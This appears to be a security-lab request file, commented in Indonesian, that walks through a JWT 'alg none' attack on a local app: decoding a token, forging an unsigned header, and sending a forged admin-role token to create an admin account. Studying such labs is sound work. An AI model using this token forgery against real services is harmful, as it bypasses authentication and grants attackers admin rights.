# ================ 2 =========================
## === Skenario 2A - Header alg none ===
### 1. LOGIN
POST http://localhost:3000/login
Content-Type: application/json

{
    "username" : "alice",
    "password" : "alice"
}


### 2. Akses token di decode berdasarkan Header, Payload, Footer

### 3. echo "Token" | base64 -d

### 4. echo -n '{ "alg":"none", "type":"jwt"}' | base64

### 5. echo -n '{}' | base64

### 2. Menambah User dengan token NONE tanpa signature dan FORGED token role dari user biasa menjadi admin
POST http://localhost:3000/api/users
Authorization: Bearer eyAiYWxnIjoibm9uZSIsICJ0eXBlIjoiand0In0.eyJ1c2VySWQiOiIxIiwibmFtZSI6ImRkIiwiZW1haWwiOiJqb2huQGV4YW1wbGUuY29tIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjkxMTU1MTg3LCJpc3MiOiJ1cm46and0In0
Content-Type: application/json

{
    "username" : "hackings",
    "email" : "email@hacking.com",
    "password" : "hacking",
    "role" : "admin"
}



